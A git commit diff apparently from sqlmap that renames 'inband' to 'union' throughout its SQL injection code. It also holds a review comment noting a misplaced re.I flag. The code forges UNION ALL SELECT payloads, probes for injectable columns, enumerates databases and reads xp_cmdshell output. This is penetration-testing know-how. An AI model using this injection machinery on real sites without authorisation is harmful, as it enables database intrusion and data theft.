Massive renaming (proper naming is inband = union & error techniques! - query naming stays as they are/in code things like forgeInbandQuery are renamed to forgeUnionQuery)
This commit is contained in:
parent
a435ba6863
commit
c1b8226329
|
@ -436,7 +436,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
# Test for UNION injection and set the sample
|
||||
# payload as well as the vector.
|
||||
# NOTE: vector is set to a tuple with 6 elements,
|
||||
# used afterwards by Agent.forgeInbandQuery()
|
||||
# used afterwards by Agent.forgeUnionQuery()
|
||||
# method to forge the UNION query payload
|
||||
|
||||
configUnion(test.request.char, test.request.columns)
|
||||
|
|
|
@ -133,7 +133,7 @@ def __formatInjection(inj):
|
|||
if stype == PAYLOAD.TECHNIQUE.UNION:
|
||||
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
|
||||
title = re.sub(r"\d+ to \d+", str(count), title)
|
||||
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
|
||||
vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
|
||||
if count == 1:
|
||||
title = title.replace("columns", "column")
|
||||
elif comment:
|
||||
|
|
|
@ -561,7 +561,7 @@ class Agent:
|
|||
|
||||
return concatenatedQuery
|
||||
|
||||
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
|
||||
def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
|
||||
"""
|
||||
Take in input an query (pseudo query) string and return its
|
||||
processed UNION ALL SELECT query.
|
||||
|
@ -602,20 +602,20 @@ class Agent:
|
|||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ):
|
||||
limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1))
|
||||
|
||||
inbandQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix)
|
||||
unionQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix)
|
||||
|
||||
if limited:
|
||||
inbandQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
|
||||
inbandQuery += fromTable
|
||||
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
|
||||
unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
|
||||
unionQuery += fromTable
|
||||
unionQuery = self.suffixQuery(unionQuery, comment, suffix)
|
||||
|
||||
return inbandQuery
|
||||
return unionQuery
|
||||
|
||||
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
|
||||
if topNumRegex:
|
||||
topNum = topNumRegex.group(1)
|
||||
query = query[len("TOP %s " % topNum):]
|
||||
inbandQuery += "TOP %s " % topNum
|
||||
unionQuery += "TOP %s " % topNum
|
||||
|
||||
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
|
||||
|
||||
|
@ -623,51 +623,51 @@ class Agent:
|
|||
intoRegExp = intoRegExp.group(1)
|
||||
query = query[:query.index(intoRegExp)]
|
||||
|
||||
if fromTable and inbandQuery.endswith(fromTable):
|
||||
inbandQuery = inbandQuery[:-len(fromTable)]
|
||||
if fromTable and unionQuery.endswith(fromTable):
|
||||
unionQuery = unionQuery[:-len(fromTable)]
|
||||
|
||||
for element in xrange(0, count):
|
||||
if element > 0:
|
||||
inbandQuery += ','
|
||||
unionQuery += ','
|
||||
|
||||
if element == position:
|
||||
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
|
||||
conditionIndex = query.index(" FROM ")
|
||||
inbandQuery += query[:conditionIndex]
|
||||
unionQuery += query[:conditionIndex]
|
||||
else:
|
||||
inbandQuery += query
|
||||
unionQuery += query
|
||||
else:
|
||||
inbandQuery += char
|
||||
unionQuery += char
|
||||
|
||||
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
|
||||
conditionIndex = query.index(" FROM ")
|
||||
inbandQuery += query[conditionIndex:]
|
||||
unionQuery += query[conditionIndex:]
|
||||
|
||||
if fromTable:
|
||||
if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery:
|
||||
inbandQuery += fromTable
|
||||
if " FROM " not in unionQuery or "(CASE " in unionQuery or "(IIF" in unionQuery:
|
||||
unionQuery += fromTable
|
||||
|
||||
if intoRegExp:
|
||||
inbandQuery += intoRegExp
|
||||
unionQuery += intoRegExp
|
||||
|
||||
if multipleUnions:
|
||||
inbandQuery += " UNION ALL SELECT "
|
||||
unionQuery += " UNION ALL SELECT "
|
||||
|
||||
for element in xrange(count):
|
||||
if element > 0:
|
||||
inbandQuery += ','
|
||||
unionQuery += ','
|
||||
|
||||
if element == position:
|
||||
inbandQuery += multipleUnions
|
||||
unionQuery += multipleUnions
|
||||
else:
|
||||
inbandQuery += char
|
||||
unionQuery += char
|
||||
|
||||
if fromTable:
|
||||
inbandQuery += fromTable
|
||||
unionQuery += fromTable
|
||||
|
||||
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
|
||||
unionQuery = self.suffixQuery(unionQuery, comment, suffix)
|
||||
|
||||
return inbandQuery
|
||||
return unionQuery
|
||||
|
||||
def limitQuery(self, num, query, field=None, uniqueField=None):
|
||||
"""
|
||||
|
|
|
@ -1150,7 +1150,7 @@ def getLimitRange(count, dump=False, plusOne=False):
|
|||
|
||||
def parseUnionPage(page):
|
||||
"""
|
||||
Returns resulting items from inband query inside provided page content
|
||||
Returns resulting items from union query inside provided page content
|
||||
"""
|
||||
|
||||
if page is None:
|
||||
|
|
|
@ -435,7 +435,7 @@ MAX_DNS_LABEL = 63
|
|||
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
|
||||
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters)
|
||||
|
||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION/inband injections)
|
||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||
|
||||
# Maximum response total page size (trimmed if larger)
|
||||
|
|
|
@ -347,9 +347,9 @@ def __goBooleanProxy(expression):
|
|||
|
||||
return output
|
||||
|
||||
def __goInband(expression, unpack=True, dump=False):
|
||||
def __goUnion(expression, unpack=True, dump=False):
|
||||
"""
|
||||
Retrieve the output of a SQL query taking advantage of an inband SQL
|
||||
Retrieve the output of a SQL query taking advantage of an union SQL
|
||||
injection vulnerability on the affected parameter.
|
||||
"""
|
||||
|
||||
|
@ -360,12 +360,10 @@ def __goInband(expression, unpack=True, dump=False):
|
|||
|
||||
return output
|
||||
|
||||
def getValue(expression, blind=True, inband=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
|
||||
def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
|
||||
"""
|
||||
Called each time sqlmap inject a SQL query on the SQL injection
|
||||
affected parameter. It can call a function to retrieve the output
|
||||
through inband SQL injection (if selected) and/or blind SQL injection
|
||||
(if selected).
|
||||
affected parameter.
|
||||
"""
|
||||
|
||||
kb.safeCharEncode = safeCharEncode
|
||||
|
@ -400,9 +398,9 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
|
|||
query = query.replace("DISTINCT ", "")
|
||||
|
||||
if not conf.forceDns:
|
||||
if inband and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||
value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
count += 1
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
|
|
|
@ -213,12 +213,12 @@ class xp_cmdshell:
|
|||
output = inject.getValue(query, resumeValue=False, blind=False, time=False)
|
||||
else:
|
||||
output = []
|
||||
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if isNumPosStrValue(count):
|
||||
for index in getLimitRange(count):
|
||||
query = agent.limitQuery(index, query, self.tblField)
|
||||
output.append(inject.getValue(query, inband=False, error=False, resumeValue=False))
|
||||
output.append(inject.getValue(query, union=False, error=False, resumeValue=False))
|
||||
|
||||
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
||||
|
||||
|
|
|
@ -101,7 +101,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
|
|||
pages = {}
|
||||
|
||||
for count in xrange(lowerCount, upperCount+1):
|
||||
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
if not isNullValue(kb.uChar):
|
||||
|
@ -166,7 +166,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
|
||||
# For each column of the table (# of NULL) perform a request using
|
||||
# the UNION ALL SELECT statement to test it the target url is
|
||||
# affected by an exploitable inband SQL injection vulnerability
|
||||
# affected by an exploitable union SQL injection vulnerability
|
||||
for position in positions:
|
||||
# Prepare expression with delimiters
|
||||
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
|
||||
|
@ -174,8 +174,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
|
||||
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
|
||||
|
||||
# Forge the inband SQL injection request
|
||||
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
|
||||
# Forge the union SQL injection request
|
||||
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
@ -196,8 +196,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
|
||||
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
|
||||
|
||||
# Confirm that it is a full inband SQL injection
|
||||
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
|
||||
# Confirm that it is a full union SQL injection
|
||||
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
@ -210,7 +210,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
|
|||
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
|
||||
|
||||
# Check for limited row output
|
||||
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
|
||||
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
@ -239,11 +239,11 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
|
|||
validPayload = None
|
||||
vector = None
|
||||
|
||||
# Confirm the inband SQL injection and get the exact column
|
||||
# Confirm the union SQL injection and get the exact column
|
||||
# position which can be used to extract data
|
||||
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count)
|
||||
|
||||
# Assure that the above function found the exploitable full inband
|
||||
# Assure that the above function found the exploitable full union
|
||||
# SQL injection position
|
||||
if not validPayload:
|
||||
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
|
||||
|
@ -252,7 +252,7 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
|
|||
|
||||
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
|
||||
"""
|
||||
This method tests if the target url is affected by an inband
|
||||
This method tests if the target url is affected by an union
|
||||
SQL injection vulnerability. The test is done up to 50 columns
|
||||
on the target database table
|
||||
"""
|
||||
|
@ -297,7 +297,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
|
|||
|
||||
def unionTest(comment, place, parameter, value, prefix, suffix):
|
||||
"""
|
||||
This method tests if the target url is affected by an inband
|
||||
This method tests if the target url is affected by an union
|
||||
SQL injection vulnerability. The test is done up to 3*50 times
|
||||
"""
|
||||
|
||||
|
|
|
@ -48,7 +48,7 @@ from lib.core.unescaper import unescaper
|
|||
from lib.request.connect import Connect as Request
|
||||
|
||||
def __oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as inband data is stored raw unconverted
|
||||
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData.resumed = retVal is not None
|
||||
|
@ -59,10 +59,10 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
|
|||
|
||||
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None
|
||||
|
||||
# Forge the inband SQL injection request
|
||||
# Forge the union SQL injection request
|
||||
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
|
||||
kb.unionDuplicates = vector[7]
|
||||
query = agent.forgeInbandQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
|
||||
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
|
||||
payload = agent.payload(newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
|
@ -90,7 +90,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
|
|||
if retVal is not None:
|
||||
retVal = getUnicode(retVal, kb.pageEncoding)
|
||||
|
||||
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of inband injection
|
||||
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection
|
||||
if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError():
|
||||
retVal = htmlunescape(retVal).replace("<br>", "\n")
|
||||
|
||||
|
@ -140,9 +140,9 @@ def configUnion(char=None, columns=None):
|
|||
|
||||
def unionUse(expression, unpack=True, dump=False):
|
||||
"""
|
||||
This function tests for an inband SQL injection on the target
|
||||
This function tests for an union SQL injection on the target
|
||||
url then call its subsidiary function to effectively perform an
|
||||
inband SQL injection on the affected url
|
||||
union SQL injection on the affected url
|
||||
"""
|
||||
|
||||
initTechnique(PAYLOAD.TECHNIQUE.UNION)
|
||||
|
@ -341,7 +341,7 @@ def unionUse(expression, unpack=True, dump=False):
|
|||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY
|
||||
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY
|
||||
value = __oneShotUnionUse(expression, unpack)
|
||||
|
||||
duration = calculateDeltaSeconds(start)
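Review bot: In `re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I)` the `re.I` is passed positionally and therefore lands in re.sub's `count` parameter (re.I == 2), not `flags`, so the ORDER BY stripping is case-sensitive and silently stops after two matches, which defeats the stated purpose of the line before the full-union fallback. Pass it by keyword and use a raw pattern: `expression = re.sub(r"\s*ORDER BY\s+[\w,]+", "", expression, flags=re.I)`, or use the inline `(?i)` prefix already used elsewhere in this commit. unionUse's body starts and ends outside this hunk.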
|
||||
|
|
|
@ -35,7 +35,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
|
||||
if count is None:
|
||||
query = dumpNode.count % table
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)
|
||||
|
||||
if isinstance(count, basestring) and count.isdigit():
|
||||
count = int(count)
|
||||
|
@ -65,7 +65,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
logger.info(infoMsg)
|
||||
|
||||
query = dumpNode.count2 % (column, table)
|
||||
value = inject.getValue(query, blind=blind, inband=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if isNumPosStrValue(value):
|
||||
validColumnList = True
|
||||
|
@ -110,7 +110,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
else:
|
||||
query = dumpNode.query2 % (column, table, colList[0], pivotValue)
|
||||
|
||||
value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, inband=not blind, error=not blind))
|
||||
value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind))
|
||||
|
||||
if column == colList[0]:
|
||||
if isNoneValue(value):
|
||||
|
|
|
@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
|
|||
|
||||
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
|
||||
_ = query.replace("%s", db)
|
||||
count = inject.getValue(_, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
if not isNoneValue(count):
|
||||
break
|
||||
|
||||
|
@ -135,7 +135,7 @@ class Enumeration(GenericEnumeration):
|
|||
for index in xrange(int(count)):
|
||||
_ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index
|
||||
|
||||
table = inject.getValue(_, inband=False, error=False)
|
||||
table = inject.getValue(_, union=False, error=False)
|
||||
if not isNoneValue(table):
|
||||
kb.hintValue = table
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
|
@ -220,7 +220,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = rootQuery.blind.count
|
||||
query = query.replace("%s", db)
|
||||
query += " AND %s" % tblQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no table"
|
||||
|
@ -239,7 +239,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = query.replace("%s", db)
|
||||
query += " AND %s" % tblQuery
|
||||
query = agent.limitQuery(index, query, tblCond)
|
||||
tbl = inject.getValue(query, inband=False, error=False)
|
||||
tbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = tbl
|
||||
foundTbls[db].append(tbl)
|
||||
|
||||
|
@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = query % (db, db, db, db, db, db)
|
||||
query += " AND %s" % colQuery.replace("[DB]", db)
|
||||
query += whereTblsQuery.replace("[DB]", db)
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no tables contain column"
|
||||
|
@ -387,7 +387,7 @@ class Enumeration(GenericEnumeration):
|
|||
query += " AND %s" % colQuery.replace("[DB]", db)
|
||||
query += whereTblsQuery.replace("[DB]", db)
|
||||
query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
|
||||
tbl = inject.getValue(query, inband=False, error=False)
|
||||
tbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = tbl
|
||||
|
||||
tbl = safeSQLIdentificatorNaming(tbl, True)
|
||||
|
|
|
@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = rootQuery.blind.count2 % queryUser
|
||||
else:
|
||||
query = rootQuery.blind.count % queryUser
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
if count != 0 and not query2:
|
||||
|
@ -145,7 +145,7 @@ class Enumeration(GenericEnumeration):
|
|||
query = rootQuery.blind.query2 % (queryUser, index)
|
||||
else:
|
||||
query = rootQuery.blind.query % (queryUser, index)
|
||||
role = inject.getValue(query, inband=False, error=False)
|
||||
role = inject.getValue(query, union=False, error=False)
|
||||
|
||||
# In Oracle we get the list of roles as string
|
||||
roles.add(role)
|
||||
|
|
|
@ -116,7 +116,7 @@ class Databases:
|
|||
query = rootQuery.blind.count2
|
||||
else:
|
||||
query = rootQuery.blind.count
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
errMsg = "unable to retrieve the number of databases"
|
||||
|
@ -132,7 +132,7 @@ class Databases:
|
|||
query = rootQuery.blind.query2 % index
|
||||
else:
|
||||
query = rootQuery.blind.query % index
|
||||
db = inject.getValue(query, inband=False, error=False)
|
||||
db = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if db:
|
||||
kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
|
||||
|
@ -300,7 +300,7 @@ class Databases:
|
|||
else:
|
||||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db)
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if count == 0:
|
||||
warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db)
|
||||
|
@ -329,7 +329,7 @@ class Databases:
|
|||
else:
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
|
||||
|
||||
table = inject.getValue(query, inband=False, error=False)
|
||||
table = inject.getValue(query, union=False, error=False)
|
||||
if not isNoneValue(table):
|
||||
kb.hintValue = table
|
||||
table = safeSQLIdentificatorNaming(table, True)
|
||||
|
@ -593,11 +593,11 @@ class Databases:
|
|||
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
query = rootQuery.blind.query % tbl
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
value = inject.getValue(query, union=False, error=False)
|
||||
parseSqliteTableSchema(value)
|
||||
return kb.data.cachedColumns
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
errMsg = "unable to retrieve the number of columns "
|
||||
|
@ -629,7 +629,7 @@ class Databases:
|
|||
field = None
|
||||
|
||||
query = agent.limitQuery(index, query, field, field)
|
||||
column = inject.getValue(query, inband=False, error=False)
|
||||
column = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if not isNoneValue(column):
|
||||
if not onlyColNames:
|
||||
|
@ -643,7 +643,7 @@ class Databases:
|
|||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query2 % (tbl, column)
|
||||
|
||||
colType = inject.getValue(query, inband=False, error=False)
|
||||
colType = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if Backend.isDbms(DBMS.FIREBIRD):
|
||||
colType = FIREBIRD_TYPES.get(colType, colType)
|
||||
|
|
|
@ -210,7 +210,7 @@ class Entries:
|
|||
else:
|
||||
query = rootQuery.blind.count % (conf.db, tbl)
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
lengths = {}
|
||||
entries = {}
|
||||
|
@ -255,7 +255,7 @@ class Entries:
|
|||
|
||||
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
|
||||
for column in colList:
|
||||
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), inband=False, error=False) == '0':
|
||||
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0':
|
||||
emptyColumns.append(column)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
|
@ -284,7 +284,7 @@ class Entries:
|
|||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query % (index, column, tbl)
|
||||
|
||||
value = NULL if column in emptyColumns else inject.getValue(query, inband=False, error=False, dump=True)
|
||||
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
|
||||
value = '' if value is None else value
|
||||
|
||||
_ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))
|
||||
|
|
|
@ -103,7 +103,7 @@ class Search:
|
|||
|
||||
query += dbQuery
|
||||
query += exclDbsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no database"
|
||||
|
@ -127,7 +127,7 @@ class Search:
|
|||
query += ") AS foobar"
|
||||
query = agent.limitQuery(index, query, dbCond)
|
||||
|
||||
value = inject.getValue(query, inband=False, error=False)
|
||||
value = inject.getValue(query, union=False, error=False)
|
||||
value = safeSQLIdentificatorNaming(value)
|
||||
foundDbs.append(value)
|
||||
|
||||
|
@ -213,7 +213,7 @@ class Search:
|
|||
query = rootQuery.blind.count
|
||||
query += tblQuery
|
||||
query += whereDbsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no databases have table"
|
||||
|
@ -234,7 +234,7 @@ class Search:
|
|||
query += ") AS foobar"
|
||||
query = agent.limitQuery(index, query)
|
||||
|
||||
foundDb = inject.getValue(query, inband=False, error=False)
|
||||
foundDb = inject.getValue(query, union=False, error=False)
|
||||
foundDb = safeSQLIdentificatorNaming(foundDb)
|
||||
|
||||
if foundDb not in foundTbls:
|
||||
|
@ -258,7 +258,7 @@ class Search:
|
|||
query = rootQuery.blind.count2
|
||||
query = query % unsafeSQLIdentificatorNaming(db)
|
||||
query += " AND %s" % tblQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no table"
|
||||
|
@ -278,7 +278,7 @@ class Search:
|
|||
query += " AND %s" % tblQuery
|
||||
query = agent.limitQuery(index, query)
|
||||
|
||||
foundTbl = inject.getValue(query, inband=False, error=False)
|
||||
